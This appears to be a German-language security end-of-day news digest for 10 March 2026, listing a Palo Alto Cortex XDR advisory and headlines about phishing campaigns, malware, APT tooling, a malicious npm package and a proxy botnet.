Paloalto: CVE-2026-0231 Cortex XDR Broker VM: Sensitive Information Disclosure Vulnerability (Severity: MEDIUM)

Tageszusammenfassung - 10.03.2026

End-of-Day report

News

Lock the Ghost

Microsoft Teams phishing targets employees with A0Backdoor malware

APT28 hackers deploy customized variant of Covenant open-source tool

Microsoft to enable Windows hotpatch security updates by default

Malicious npm Package Posing as OpenClaw Installer Deploys RAT, Steals macOS Credentials

KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet

Bawag-Phishing: Debitkarte, PIN-Code und Zugangsdaten für Onlinebanking in Gefahr!

Iranian MOIS Actors & the Cyber Crime Connection

OpenClaw Advisory Surge Highlights Gaps Between GHSA and CVE Tracking